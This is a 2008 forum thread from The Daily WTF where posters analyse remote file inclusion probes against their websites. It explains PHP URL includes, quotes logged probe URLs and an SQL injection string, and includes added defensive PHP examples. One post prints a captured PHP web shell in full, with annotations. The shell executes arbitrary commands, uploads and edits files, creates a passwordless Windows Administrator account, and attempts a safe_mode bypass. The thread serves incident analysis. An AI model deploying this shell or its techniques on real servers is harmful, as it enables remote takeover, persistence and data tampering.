The Daily WTF: Curious Perversions in Information Technology

Weird injection attempts

Last post 02-21-2008 2:09 PM by zzo38. 8 replies.
  • 01-15-2008 6:51 PM

    Weird injection attempts

    So... we noticed that some script kiddy (or zombie computer) was attempting to pull off some URL-parameter injection on some of our websites. Most often, they tried to change one of the URL parameters to a URL (i.e. http://www.example.com/?var=http://www.1337h4x0r/script.php). When I went to the URL being passed in, I found some PHP code:

     

    <?php echo md5("just_a_test")>
     
    Besides the fact that *none* of our pages are running on PHP, how in the hell is this supposed to work?  
    Are there pages out there that accept a URL as an argument and then arbitrarily execute whatever code is on that page?  Is this some crazy bug in an older version of PHP?

     

  • 01-15-2008 7:14 PM In reply to

    Re: Weird injection attempts

    It's not a bug, it's a feature! (The "mapping URI parameters to global variables" kind of feature)

    PHP has, since a few versions, a framework for handling URI schemes. If any function that expects a local file path as an argument instead receives a string that looks like a URI, it will "automagically" attempt to call up the appropriate scheme handler and let it do the work of retrieving the file. So fopen("/file") would open "file" on the local drive, but fopen("http://example.com/file") would try to download it from example.com, completely transparent to your script.

    In PHP's usual foresight and ingenuity, they expanded this mechanism to fancier functions as well - like include(). Combine that with a call to, let's say include($_GET["module"] . "/init.php"); in Joe Braindead's PHP script and you got your function on the silver table.
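
The include pattern described in the post above, next to a constrained alternative. This is an added example, not code from the thread; `resolve_module()`, `url_include_enabled()`, the module names and the directory layout are assumptions made for illustration.

```php
<?php
declare(strict_types=1);

// The pattern from the post, kept as a comment so it is never executed:
//     include($_GET["module"] . "/init.php");
// Nothing constrains "module", so a URL value is handed to the URL wrapper.

/**
 * Map a request-supplied module name to a local init.php, or return null.
 * Hypothetical helper: the names and directory layout are assumptions.
 */
function resolve_module(string $requested, array $allowed, string $baseDir): ?string
{
    // 1. Exact allow-list match. URLs, "../" sequences and NUL bytes never match.
    if (!in_array($requested, $allowed, true)) {
        return null;
    }
    // 2. Defence in depth: canonicalise and require the file to sit under $baseDir.
    $base = realpath($baseDir);
    $path = realpath($baseDir . '/' . $requested . '/init.php');
    if ($base === false || $path === false) {
        return null;                       // missing directory or file
    }
    $prefix = rtrim($base, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    return strncmp($path, $prefix, strlen($prefix)) === 0 ? $path : null;
}

/** True when php.ini lets include/require fetch URLs (it should be off). */
function url_include_enabled(): bool
{
    return filter_var(ini_get('allow_url_include'), FILTER_VALIDATE_BOOLEAN);
}

// --- Constructed demo: a throwaway module tree under the temp directory ---
$base = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'modules_demo_' . getmypid();
mkdir($base . '/news', 0700, true);
file_put_contents($base . '/news/init.php', "<?php return 'news module loaded';\n");

$allowed = ['news', 'gallery'];            // 'gallery' is allowed but absent on disk
$samples = [                               // constructed request values
    'news',
    'gallery',
    'http://remote.example/script.php',
    '../../etc',
    "news\0",
];

foreach ($samples as $module) {
    $path = resolve_module($module, $allowed, $base);
    $outcome = 'rejected';
    if ($path !== null) {
        $outcome = include $path;          // only ever a vetted local file
    }
    printf("%-40s %s\n", json_encode($module, JSON_UNESCAPED_SLASHES), $outcome);
}
printf("allow_url_include enabled: %s\n", url_include_enabled() ? 'yes' : 'no');

// Remove the demo tree again.
unlink($base . '/news/init.php');
rmdir($base . '/news');
rmdir($base);
```

Only `news` resolves to a file; every other sample is rejected before any filesystem or network access happens. The `allow_url_include` setting has existed since PHP 5.2 and defaults to off.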

  • 01-15-2008 7:23 PM In reply to

    Re: Weird injection attempts

    I expect they're probing for XSS holes. If they find a way to inject HTML goop into your pages, the real attack would contain a chunk of JavaScript instead.
  • 01-15-2008 7:39 PM In reply to

    Re: Weird injection attempts

    PSWorx:

    It's not a bug, it's a feature! (The "mapping URI parameters to global variables" kind of feature)

    PHP has, since a few versions, a framework for handling URI schemes. If any function that expects a local file path as an argument instead receives a string that looks like a URI, it will "automagically" attempt to call up the appropriate scheme handler and let it do the work of retrieving the file. So fopen("/file") would open "file" on the local drive, but fopen("http://example.com/file") would try to download it from example.com, completely transparent to your script.

    In PHP's usual foresight and ingenuity, they expanded this mechanism to fancier functions as well - like include(). Combine that with a call to, let's say include($_GET["module"] . "/init.php"); in Joe Braindead's PHP script and you got your function on the silver table.

     

    Ah, that makes sense.  Still, you'd have to be pretty damn stupid to write code that gets filenames from URL parameters...yikes!

  • 01-15-2008 8:42 PM In reply to

    Re: Weird injection attempts

    bighusker:
    PSWorx:

    It's not a bug, it's a feature! (The "mapping URI parameters to global variables" kind of feature)

    PHP has, since a few versions, a framework for handling URI schemes. If any function that expects a local file path as an argument instead receives a string that looks like a URI, it will "automagically" attempt to call up the appropriate scheme handler and let it do the work of retrieving the file. So fopen("/file") would open "file" on the local drive, but fopen("http://example.com/file") would try to download it from example.com, completely transparent to your script.

    In PHP's usual foresight and ingenuity, they expanded this mechanism to fancier functions as well - like include(). Combine that with a call to, let's say include($_GET["module"] . "/init.php"); in Joe Braindead's PHP script and you got your function on the silver table.

     

    Ah, that makes sense.  Still, you'd have to be pretty damn stupid to write code that gets filenames from URL parameters...yikes!

     

    I see you're new to this site. 

  • 01-21-2008 11:05 AM In reply to

    Re: Weird injection attempts

    I've been getting the same thing. It happens 5 times a day within 5 minutes, always around 10am. We're getting two things happening.

     http://www.company.com/pcc/index.aspx?lnkID=http://www.sectoranime.com.mx/galeria/include/nokuc/kef/&imgID=PCC_conferences.jpg threw an error message. 

    and

    your usual SQL injection attempts.

    http://www.masspartnership.com/about/index.aspx?imgid=newsandevents.jpg&lnkid=newsandevents.ascx' and user>0 and ''=' threw an error message.

     

     Going to the URLs shown always shows the same bit of PHP code. <?php echo md5("just_a_test")>

    I've got a list of 10 sites that they try to pass.

     

    "Void* is not actually void*" - Best error message EVER!

    My method of measuring code quality is to ask myself if I would rather have herpes or maintain the code in question. In this case I would choose death by herpes. --akatherder

    People who work in VB or any variant thereof are not programmers, they are circus chimps throwing feces into an IDE... --chebrock

    My dad chased him off with a shotgun, which apparently pissed this guy off so much he felt the need to strip naked, sit in the middle of his front yard, and chop up live kittens with a machete to feed to his pet boa.
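
A way to pull the probes reported in the posts above out of an access log and group them by client. This is an added example, not code from the thread; the log lines are constructed (documentation IP ranges, `.example` hosts), and `find_url_valued_params()`, `summarize_probes()` and `OWN_HOSTS` are hypothetical names.

```php
<?php
declare(strict_types=1);

// Assumption: hosts this site may legitimately pass to itself (return URLs etc.).
const OWN_HOSTS = ['www.example.com'];

/**
 * Return [param => url] for each query parameter whose value is an absolute URL.
 * Scans the raw query text, so ';' separators or a second '?' inside the query
 * do not hide a parameter the way a strict key=value&... parser would.
 */
function find_url_valued_params(string $requestUri): array
{
    $qpos = strpos($requestUri, '?');
    if ($qpos === false) {
        return [];
    }
    // Decode once so that http%3A%2F%2F is seen as http://
    $query = rawurldecode(substr($requestUri, $qpos + 1));
    $hits = [];
    $re = '~(?:^|[&;?])([^=&;?]+)=((?:https?|ftp)://[^&;\s]+)~i';
    if (preg_match_all($re, $query, $matches, PREG_SET_ORDER)) {
        foreach ($matches as $match) {
            $hits[$match[1]] = $match[2];
        }
    }
    return $hits;
}

/** Group URL-valued-parameter requests by client IP, ignoring our own hosts. */
function summarize_probes(array $logLines): array
{
    $lineRe = '~^(\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (\S+) [^"]*" \d{3}~';
    $byClient = [];
    foreach ($logLines as $line) {
        if (!preg_match($lineRe, $line, $m)) {
            continue;                      // not a combined-format request line
        }
        [, $ip, $uri] = $m;
        foreach (find_url_valued_params($uri) as $param => $url) {
            $host = strtolower((string) parse_url($url, PHP_URL_HOST));
            if ($host === '' || in_array($host, OWN_HOSTS, true)) {
                continue;                  // unparsable, or a link back to ourselves
            }
            $byClient[$ip]['requests'] = ($byClient[$ip]['requests'] ?? 0) + 1;
            $byClient[$ip]['params'][$param] = true;
            $byClient[$ip]['remote_hosts'][$host] = true;
        }
    }
    // Turn the de-duplicating key sets into plain lists for reporting.
    foreach ($byClient as $ip => $info) {
        $byClient[$ip]['params'] = array_keys($info['params']);
        $byClient[$ip]['remote_hosts'] = array_keys($info['remote_hosts']);
    }
    return $byClient;
}

// Constructed sample log lines, modelled on the request shapes in this thread.
$log = [
    '198.51.100.7 - - [21/Jan/2008:10:01:12 -0500] "GET /pcc/index.aspx?lnkID=http://remote.example/galeria/include/&imgID=PCC_conferences.jpg HTTP/1.1" 500 1204',
    '198.51.100.7 - - [21/Jan/2008:10:01:40 -0500] "GET /about/index.aspx?imgid=news.jpg&lnkid=http%3A%2F%2Fother.example%2Fkef%2F HTTP/1.1" 500 1204',
    '203.0.113.9 - - [21/Jan/2008:10:02:03 -0500] "GET /forums/index.php?board=15;action=display;threadid=1/Sources/x.php?sourcedir=http://remote.example/a.txt HTTP/1.1" 200 5120',
    '192.0.2.44 - - [21/Jan/2008:10:03:00 -0500] "GET /login.aspx?returnUrl=http://www.example.com/account HTTP/1.1" 200 880',
    '192.0.2.44 - - [21/Jan/2008:10:03:05 -0500] "GET /about/index.aspx?imgid=news.jpg&lnkid=news.ascx HTTP/1.1" 200 880',
];

echo json_encode(summarize_probes($log), JSON_PRETTY_PRINT | JSON_UNESCAPED_SLASHES), "\n";
```

On the sample lines, 198.51.100.7 is reported with two requests against two remote hosts and 203.0.113.9 with one; 192.0.2.44 is not reported, because its only URL-valued parameter points back at the site's own host.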
  • 01-21-2008 12:02 PM In reply to

    Re: Weird injection attempts

    found this on the web 
     
    	 Guest : 162.39.119.102 : July 12, 2007, 05:40:08 AM
    /forums/index.php?board=15;action=display;threadid=2286/Sources/Packages.php?sourcedir=http://members.lycos.co.uk/kalafi0r/asd.txt???
    
    kalafi0r seems to be some Polish script kiddy. On the move:
    http://security.pigstye.net/staticpages/index.php/index
    
    $ nslookup  162.39.119.102
    Server:         216.201.118.101
    Address:        216.201.118.101#53
    
    Non-authoritative answer:
    102.119.39.162.in-addr.arpa     name = h102.119.39.162.ip.alltel.net.
    
    TRACE:
    traceroute to h102.119.39.162.ip.alltel.net (162.39.119.102), 30 hops max, 38 byte packets
     ...
     6  tbr2.attga.ip.att.net (12.122.10.137)  59.477 ms  55.821 ms  55.611 ms
         MPLS Label=31746 CoS=3 TTL=1 S=0
     7  gar5.attga.ip.att.net (12.123.20.181)  54.272 ms  54.308 ms  55.562 ms
     8  12.118.120.118 (12.118.120.118)  54.081 ms  58.049 ms  85.980 ms
     9  h121.21.213.151.ip.alltel.net (151.213.21.121)  63.574 ms  64.787 ms  64.962 ms
    10  h54.33.213.151.ip.alltel.net (151.213.33.54)  62.919 ms h58.33.213.151.ip.alltel.net (151.213.33.58)  65.127 ms  64.626 ms
    11  h123.21.213.151.ip.alltel.net (151.213.21.123)  70.105 ms h107.21.213.151.ip.alltel.net (151.213.21.107)  108.281 ms h123.21.213.151.ip.alltel.net (151.213.21.123)  68.374 ms
    12  mthwnc-7200-2.alltel.net (166.102.102.232)  68.345 ms  68.061 ms  68.389 ms
    13  h97.119.39.162.ip.alltel.net (162.39.119.97)  74.313 ms  74.527 ms  77.739 ms
    14  h102.119.39.162.ip.alltel.net (162.39.119.102)  79.976 ms  77.663 ms  76.522
    
    Matthews, North Carolina? Not many Poles there, probably a bot-infected win box
    http://www.google.com/maps?q=Matthews,+NC,+USA&output=html 
    
    This topic doesn't exist on this board. - "2286/Sources/Packages.php?sourcedir=http://members.lycos.co.uk/kalafi0r/asd.txt???"
    
    Our attacker is trying to get our server to include some extra unvalidated PHP code. The Lycos page has the following source:
    
    =~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~ malcode ~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=
    
    <html>
    <head>
    <meta http-equiv="Content-Language" content="pt-br">
    
      <!-- FRONTAPAGE, HUH. SOMEONE HAS A SENSE OF HUMOR :) //-->
    
    <meta name="GENERATOR" content="Microsoft FrontPage 5.0">
    <meta name="ProgId" content="AoD">
    <meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
    
     <!-- BY POLSKI SCRIPT KIDD, WHO CAN CUT N PASTE REALLY LEET  //-->
    
    <title>By destructive > irc.gigachat.net > CMD > File List</title>
    <style type="text/css">
    A:link {text-decoration:none}
    A:visited {text-decoration:none}
    A:hover {text-decoration:underline}
    A:active {text-decoration:underline}
    </style>
    </head>
    <body style="font-family: Tahoma; font-size: 10px">
    <?php
    
     @set_time_limit(0);
    
     $string = $_SERVER['QUERY_STRING'];
    
     $mhost = 'http://www.avto.bz/lang/.../cmd.txt?';
    
     // NOT SURE WHAT WE'RE EXPLODING HERE, AVTO.BZ DOESN'T RESOLVE
     // ALTHOUGH, THE GOOGLE CACHE SHOWS ITS GHOST:
     // http://64.233.169.104/search?q=cache:J3mih5icxVEJ:www.avto.bz/links.php+%22avto.bz%22&hl=en&ct=clnk&cd=7&gl=us
    
     $host_all = explode("$mhost", $string);
     $s1 = $host_all[0];
    
     // $_SERVER['PHP_SELF'] is filename of the currently executing script
     // $fstring WILL BE THE SHORTHAND FOR THE XSS CALL TO OUR SERVER, TO GET IT TO EXECUTE
     // ALL OF THE PROGS, FUNCTIONS, ETC
    
     $fstring = $_SERVER['PHP_SELF']."?".$s1.$mhost;
    
     $OS = @PHP_OS;
     $IpServer = '127.0.0.1';
     $UNAME = @php_uname();
     $PHPv = @phpversion();
     $SafeMode = @ini_get('safe_mode');
    
     if ($SafeMode == '') { $SafeMode = "<i>OFF</i>"; }
     else { $SafeMode = "<i>$SafeMode</i>"; }
    
     // BELOW SOURCES ONLY LOAD SRC FROM http://www.home-equity-loans-1.org/l.php
     // CHANGED? ABANDONED?
    
     $btname = 'backtool.txt';
     $bt = 'http://www.full-comandos.com/jobing/r0nin';
     $dc = 'http://www.full-comandos.com/jobing/dc.txt';
    
     // LOOKS LIKE WE'RE MAKING WINDOWS ADMIN ACCOUNTS 
     // LOOK FOR WEBBOT'S INVOCATION OF "$cmd=$newuser" 
    
     $newuser = '@echo off;net user Admin /add /expires:never /passwordreq:no;net localgroup &quot;Administrators&quot; /add Admin;net localgroup &quot;Users&quot; /del Admin';
    
    
     // HERE'S SOME JS FILE WRANGLING FUNCTIONS (CHMOD, COPY, CD, RENAME, MKDIR)
    
     // Java Script
     echo "<script type=\"text/javascript\">";
     echo "function ChMod(chdir, file) {";
     echo "var o = prompt('Chmod: - Exemple: 0777', '');";
     echo "if (o) {";
     echo "window.location=\"\" + '{$fstring}&action=chmod&chdir=' + chdir + '&file=' + file + '&chmod=' + o + \"\";";
     echo "}";
     echo "}";
     echo "function Rename(chdir, file, mode) {";
     echo "if (mode == 'edit') {";
     echo "var o = prompt('Rename file '+ file + ' for:', '');";
     echo "}";
     echo "else {";
     echo "var o = prompt('Rename dir '+ file + ' for:', '');";
     echo "}";
     echo "if (o) {";
     echo "window.location=\"\" + '{$fstring}&action=rename&chdir=' + chdir + '&file=' + file + '&newname=' + o + '&mode=' + mode +\"\";";
     echo "}";
     echo "}";
     echo "function Copy(chdir, file) {";
     echo "var o = prompt('Copied for:', '/tmp/' + file);";
     echo "if (o) {";
     echo "window.location=\"\" + '{$fstring}&action=copy&chdir=' + chdir + '&file=' + file + '&fcopy=' + o + \"\";";
     echo "}";
     echo "}";
     echo "function Mkdir(chdir) {";
     echo "var o = prompt('Which name?', 'NewDir');";
     echo "if (o) {";
     echo "window.location=\"\" + '{$fstring}&action=mkdir&chdir=' + chdir + '&newdir=' + o + \"\";";
     echo "}";
     echo "}";
     echo "function Newfile(chdir) {";
     echo "var o = prompt('Which name?', 'NewFile.txt');";
     echo "if (o) {";
     echo "window.location=\"\" + '{$fstring}&action=newfile&chdir=' + chdir + '&newfile=' + o + \"\";";
     echo "}";
     echo "}";
     echo "</script>";
    
     // End JavaScript
    
    	/* Functions */
    	function cmd($CMDs) {
    		$CMD[1] = '';
    		exec($CMDs, $CMD[1]);
    		if (empty($CMD[1])) {
    			$CMD[1] = shell_exec($CMDs);
    		}
    			elseif (empty($CMD[1])) {
    			$CMD[1] = passthru($CMDs);
    		}
    		elseif (empty($CMD[1])) {
    			$CMD[1] = system($CMDs);
    		}
    		elseif (empty($CMD[1])) {
    			$handle = popen($CMDs, 'r');
    			while(!feof($handle)) {
    				$CMD[1][ .= fgets($handle);
    			}
    			pclose($handle);
    		}
    		return $CMD[1];
    	}
     
    if (@$_GET['chdir']) {
     $chdir = $_GET['chdir']; 
    } else {
       $chdir = getcwd()."/";
      }
    if (@chdir("$chdir")) {
     $msg = "<font color=\"#008000\">Entrance&nbsp;in&nbsp;the&nbsp;directory,&nbsp;OK!</font>";
    } else {
     $msg = "<font color=\"#FF0000\">Error&nbsp;to&nbsp;enters&nbsp;it&nbsp;in&nbsp;the&nbsp;directory!</font>";
     $chdir = str_replace($SCRIPT_NAME, "", $_SERVER['SCRIPT_NAME']);
    }
    
     // REPLACE BACKSLASH WITH FWD SLASH, YEP ITS FOR WINDOWS ALLRIGHT
    
     $chdir = str_replace(chr(92), chr(47), $chdir);
    
     // CMD==UPLOAD: DENOTE SUCCESS IF WE UPLOAD OUR BOT CODE SUCCESSFULLY
    
    if (@$_GET['action'] == 'upload') {
     $uploaddir = $chdir;
    
         //USING HTTP POST TO UPLOAD JUNK ($_FILES)
    
     $uploadfile = $uploaddir. $_FILES['userfile']['name'];
     if (@move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir . $_FILES['userfile']['name'])) {
      $msg = "<font color=\"#008000\"><font color=\"#000080\">{$_FILES['userfile']['name']}</font>,&nbsp;the&nbsp;archive&nbsp;is&nbsp;validates&nbsp;and&nbsp;was&nbsp;loaded&nbsp;successfully.</font>";
     } else {
        $msg = "<font color=\"#FF0000\">Error&nbsp;when&nbsp;copying&nbsp;archive.</font>";
       }
    }
    
      //CMD==MKDIR: MAKE A NEW DIR
    
    elseif (@$_GET['action'] == 'mkdir') {
        $newdir = $_GET['newdir'];
        if (@mkdir("$chdir"."$newdir")) {
         $msg = "<font color=\"#008000\"><font color=\"#000080\">{$newdir}</font>,&nbsp;directory&nbsp;created successfully.</font>";
        } else {
           $msg = "<font color=\"#FF0000\">Error&nbsp;to&nbsp;it&nbsp;creates&nbsp;directory.</font>";
          }
    }
    
      //CMD==NEWFILE: TOUCH OFF A FILE
    
    elseif (@$_GET['action'] == 'newfile') {
        $newfile = $_GET['newfile'];
        if (@touch("$chdir"."$newfile")) {
         $msg = "<font color=\"#008000\"><font color=\"#000080\">{$newfile}</font>,&nbsp;created successfully!</font>";
        } else {
           $msg = "<font color=\"#FF0000\">Error&nbsp;to&nbsp;tries&nbsp;it&nbsp;creates&nbsp;archive.</font>";
          }
    }
    
      //CMD==DELETE:
      // FILES 
    elseif (@$_GET['action'] == 'del') {
         $file = $_GET['file']; $type = $_GET['type'];
         if ($type == 'file') {
          if (@unlink("$chdir"."$file")) {
           $msg = "<font color=\"#008000\"><font color=\"#000080\">{$file}</font>,&nbsp;successfully&nbsp;excluded&nbsp;archive!</font>";
          } else {
             $msg = "<font color=\"#FF0000\">Error&nbsp;to&nbsp;it&nbsp;I&nbsp;excluded&nbsp;archive!</font>";
            }
       // DIRS
         } elseif ($type == 'dir') {
            if (@rmdir("$chdir"."$file")) {
              $msg = "<font color=\"#008000\"><font color=\"#000080\">{$file}</font>,&nbsp;successfully&nbsp;excluded&nbsp;directory!</font>";
            } else {
               $msg = "<font color=\"#FF0000\">Error&nbsp;to&nbsp;it&nbsp;I&nbsp;excluded&nbsp;directory!</font>";
              }
           }
    }
    
      // CMD==CHMOD: 777 SOME FILES
    
    elseif (@$_GET['action'] == 'chmod') {
         $file = $chdir.$_GET['file']; $chmod = $_GET['chmod'];
         if (@chmod ("$file", $chmod)) {
      
          $msg = "<font color=\"#008000\">Chmod&nbsp;of</font>&nbsp;<font color=\"#000080\">{$_GET['file']}</font>&nbsp;<font color=\"#008000\">moved&nbsp;for</font>&nbsp;<font color=\"#000080\">$chmod</font>&nbsp;<font color=\"#008000\">successfully.</font>";
         } else {
            $msg = '<font color=\"#FF0000\">Error&nbsp;when&nbsp;moving&nbsp;chmod.</font>';
           }
    }
    
      //CMD==RENAME: RENAME
    
    elseif (@$_GET['action'] == 'rename') {
         $file = $_GET['file']; $newname = $_GET['newname'];
         if (@rename("$chdir"."$file", "$chdir"."$newname")) {
          $msg = "<font color=\"#008000\">Archive</font>&nbsp;<font color=\"#000080\">{$file}</font>&nbsp;<font color=\"#008000\">named for</font>&nbsp;<font color=\"#000080\">{$newname}</font>&nbsp;<font color=\"#008000\">successfully!</font>";
         } else {
            $msg = "<font color=\"#FF0000\">Error&nbsp;to&nbsp;it&nbsp;nominates&nbsp;archive.</font>";
           }
    }
    
      //CMD==COPY: DUPE SOME SHIT
    
    elseif (@$_GET['action'] == 'copy') {
        $file = $chdir.$_GET['file']; $copy = $_GET['fcopy'];
        if (@copy("$file", "$copy")) {
         $msg = "<font color=\"#000080\">{$file}</font>,&nbsp;<font color=\"#008000\">copied for</font> <font color=\"#000080\">{$copy}</font> <font color=\"#008000\">successfully!</font>";
        } else {
           $msg = "<font color=\"#FF0000\">Error&nbsp;when&nbsp;copying</font>&nbsp;<font color=\"#000000\">{$file}</font>&nbsp;<font color=\"#FF0000\">for</font>&nbsp;<font color=\"#000000\">{$copy}</font></font>";
          }
    }
    /* Parte Atualiza 02:48 12/2/2006 */
    
      //CMD==COMMAND: DO SOME SHIT
    
    elseif (@$_GET['action'] == 'cmd') {
    	if (!empty($_GET['cmd'])) { $cmd = @$_GET['cmd']; }
    	if (!empty($_POST['cmd'])) { $cmd = @$_POST['cmd']; }
    
    	$cmd = stripslashes(trim($cmd));
    	$result_arr = cmd($cmd);
    	
    	$afim = count($result_arr); $acom = 0; $msg = '';
    	$msg .= "<p style=\"color: #000000;text-align: center;font-family: 'Lucida Console';font-size: 12px;margin 2\">Results:&nbsp;<b>".$cmd."</b></p>";
    	if ($result_arr) {
    		while ($acom <= $afim) {
    			$msg .= "<p style=\"color: #008000;text-align: left;font-family: 'Lucida Console';font-size: 12px;margin 2\">&nbsp;".@$result_arr[$acom]."</p>";
    		$acom++;
     		}
    	}
    	else {
    		$msg .= "<p style=\"color: #FF0000;text-align: center;font-family: 'Lucida Console';font-size: 12px;margin 2\">Erro ao executar comando.</p>";
    
         // ERRO AO EXECUTAR COMANDO??? PORTUGUESE HAX0R mebbe?
    
    	}
    }
    elseif (@$_GET['action'] == 'safemode') {
    
    // CHECKING FOR/USING SHARED MEMORY OPS SO WE CAN
    // EXECUTE THE PHP SAFE MODE BYPASS:
    // http://securityvulns.com/files/safe_mode_bypass.php
    
    if (@!extension_loaded('shmop')) {
     echo "Loading... module</br>";
    
        if (strtoupper(substr(PHP_OS, 0,3) == 'WIN')) {
            @dl('php_shmop.dll');
        } else {
            @dl('shmop.so');
        }
    }
    
    if (@extension_loaded('shmop')) {
     echo "Module: <b>shmop</b> loaded!</br>";
    
    // PHP SAFE MODE BYPASS:
    
     $shm_id = @shmop_open(0xff2, "c", 0644, 100);
     if (!$shm_id) { echo "Couldn't create shared memory segment\\n"; }
     $data="\\x00";
     $offset=-3842685;
     $shm_bytes_written = @shmop_write($shm_id, $data, $offset);
     if ($shm_bytes_written != strlen($data)) { echo "Couldn't write the entire length of data\\n"; }
     if (!shmop_delete($shm_id)) { echo "Couldn't mark shared memory block for deletion."; }
     echo passthru("id"); 
     shmop_close($shm_id);
    
    
    } else { echo "Module: <b>shmop</b> not loaded!</br>"; }
    }
    
    // CMD==ZIP FILES
    
    elseif (@$_GET['action'] == 'zipen') {
     $file = $_GET['file'];
     $zip = @zip_open("$chdir"."$file");
     $msg = '';
    if ($zip) {
    
        while ($zip_entry = zip_read($zip)) {
            $msg .= "Name:               " . zip_entry_name($zip_entry) . "\\n";
            $msg .= "Actual Filesize:    " . zip_entry_filesize($zip_entry) . "\\n";
            $msg .= "Compressed Size:    " . zip_entry_compressedsize($zip_entry) . "\\n";
            $msg .= "Compression Method: " . zip_entry_compressionmethod($zip_entry) . "\\n";
    
            if (zip_entry_open($zip, $zip_entry, "r")) {
                echo "File Contents:\\n";
                $buf = zip_entry_read($zip_entry, zip_entry_filesize($zip_entry));
                echo "$buf\\n";
    
                zip_entry_close($zip_entry);
            }
            echo "\\n";
    
        }
    
        zip_close($zip);
    
    }
    }
    
      //CMD==EDIT
    
    elseif (@$_GET['action'] == 'edit') {
     $file = $_GET['file'];
     $conteudo = '';
     $filename = "$chdir"."$file";
     
     // read file $filename into string $conteudo
     // Conteúdo?? That's Portuguese for "content" y'all - hmmm
     // Portuguese?? interesting.....
    
     $conteudo = @file_get_contents($filename);
    
     // Convert special characters to HTML entities
    
     $conteudo = htmlspecialchars($conteudo);
    
       //$_SERVER is an array containing information such as headers, paths, and script locations. IT IS PART OF THE register_globals SECURITY FIASCO (right? check my facts here, I'm not 100% on that).
    
     $back = $_SERVER['HTTP_REFERER'];
     echo "<p align=\"center\">Editing&nbsp;{$file}&nbsp;...</p>";
     echo "<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" style=\"border-collapse: collapse\" width=\"100%\" id=\"editacao\">";
     echo "<tr>";
     echo "<td width=\"100%\">";
     echo "<form method=\"POST\" action=\"{$fstring}&amp;action=save&amp;chdir={$chdir}&amp;file={$file}\">";
    
      // NOTICE THE REFERENCE TO "webbot" AND ITS LOGFILE: _private/form_results.csv
    
     echo "<!--webbot bot=\"SaveResults\" u-file=\"_private/form_results.csv\" s-format=\"TEXT/CSV\" s-label-fields=\"TRUE\" --><p align=\"center\">";
     print "<textarea rows=\"18\" name=\"S1\" cols=\"89\" style=\"font-family: Verdana; font-size: 10pt; border: 1px solid #000000\">{$conteudo}</textarea></p>";
     echo "<p align=\"center\">";
     echo "<input type=\"submit\" value=\"Save\" name=\"B2\" style=\"font-family: Tahoma; font-size: 10px; border: 1px solid #000000\">&nbsp;";
     echo "<input type=\"button\" value=\"Closes Publisher\" Onclick=\"javascriptwindow.location='{$fstring}&amp;chdir={$chdir}'\" name=\"B1\" style=\"font-family: Tahoma; font-size: 10px; border: 1px solid #000000\">&nbsp;";
     echo "</form>";
     echo "</td>";
     echo "</tr>";
     echo "</table>";
    }
    
      //CMD==SAVE
    
    elseif (@$_GET['action'] == 'save') {
       $filename = "$chdir".$_GET['file'];
       $somecontent = $_POST['S1'];
       $somecontent = stripslashes(trim($somecontent));
       if (is_writable($filename)) {
        @$handle = fopen ($filename, "w");
        @$fw = fwrite($handle, $somecontent);
        @fclose($handle);
        if ($handle && $fw) {
         $msg = "<font color=\"#000080\">{$_GET['file']}</font>,&nbsp;<font color=\"#008000\">edited&nbsp;successfully!</font>";
        }
     } else {
        $msg = "<font color=\"#000000\">{$_GET['file']},</font>&nbsp;<font color=\"#FF0000\">cannot&nbsp;be&nbsp;written!</font>";
       }
    }
    
      // INVENTORY TIME!!
    
    // Informa&#65533;&#65533;es
     $cmdget = '';
     if (!empty($_GET['cmd'])) { $cmdget = @$_GET['cmd']; }
     if (!empty($_POST['cmd'])) { $cmdget = @$_POST['cmd']; }
     $cmdget = htmlspecialchars($cmdget);
     function asdads() {
      $asdads = '';
    
      // LESSEE WHAT KEWL TOOLS ARE PRELOADED FOR US....
    
      if (@file_exists("/usr/bin/wget")) { $asdads .= "wget&nbsp;"; }
      if (@file_exists("/usr/bin/fetch")) { $asdads .= "fetch&nbsp;"; }
      if (@file_exists("/usr/bin/curl")) { $asdads .= "curl&nbsp;"; }
      if (@file_exists("/usr/bin/GET")) { $asdads .= "GET&nbsp;"; }
      if (@file_exists("/usr/bin/lynx")) { $asdads .= "lynx&nbsp;"; }
      return $asdads;
     }
    
      //ID THE SYSTEM OS AND PHP VERSIONS
    
    echo "<form method=\"POST\" name=\"cmd\" action=\"{$fstring}&amp;action=cmd&amp;chdir=$chdir\">";
    echo "<fieldset style=\"border: 1px solid #000000; padding: 2\">";
    echo "<legend>Informa&#65533;&#65533;es</legend>";
    echo "<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" style=\"border-collapse: collapse; font-family: Tahoma; font-size: 10px\" width=\"100%\">";
    echo "<tr>";
    echo "<td width=\"8%\">";
    echo "<p align=\"right\"><b>Sistema:</b>&nbsp;</td></p>";
    echo "<td width=\"92%\">&nbsp;{$OS}</td>";
    echo "</tr>";
    echo "<tr>";
    echo "<td width=\"8%\">";
    echo "<p align=\"right\"><b>Uname:&nbsp;</b></td></p>";
    echo "<td width=\"92%\">&nbsp;{$UNAME}</td>";
    echo "</tr>";
    echo "<tr>";
    echo "<td width=\"8%\">";
    echo "<p align=\"right\"><b>PHP:&nbsp;</b></td></p>";
    echo "<td width=\"92%\">&nbsp;{$PHPv},&nbsp;<b>safe mode:</b>&nbsp;{$SafeMode}</td>";
    echo "</tr>";
     if (strtoupper(substr($OS, 0,3) != 'WIN')) {
      $Methods = asdads();
      if ($Methods == '') { $Methods = "???"; }
      echo "<tr>";
      echo "<td width=\"8%\">";
      echo "<p align=\"right\"><b>Methods:&nbsp;</b></td></p>";
      echo "<td width=\"92%\">&nbsp;{$Methods}</td>";
      echo "</tr>";
     }
    
    echo "<tr>";
    echo "<td width=\"8%\">";
    echo "<p align=\"right\"><b>Ip:&nbsp;</b></td></p>";
    echo "<td width=\"92%\">&nbsp;{$IpServer}</td>";
    echo "</tr>";
    echo "<tr>";
    echo "<td width=\"8%\">";
    echo "<p align=\"right\"><b>Command:&nbsp;</b></td></p>";
    echo "<td width=\"92%\">&nbsp;<input type=\"text\" size=\"70\" name=\"cmd\" value=\"{$cmdget}\" style=\"font-family: Tahoma; font-size: 10 px; border: 1px solid #000000\">&nbsp;<input type=\"submit\" name=\"action\" value=\"Send\" style=\"font-family: Tahoma; font-size: 10 px; border: 1px solid #000000\"></td>";
    echo "</tr>";
    echo "</table>";
    echo "</fieldset></form>";
    // Dir
    
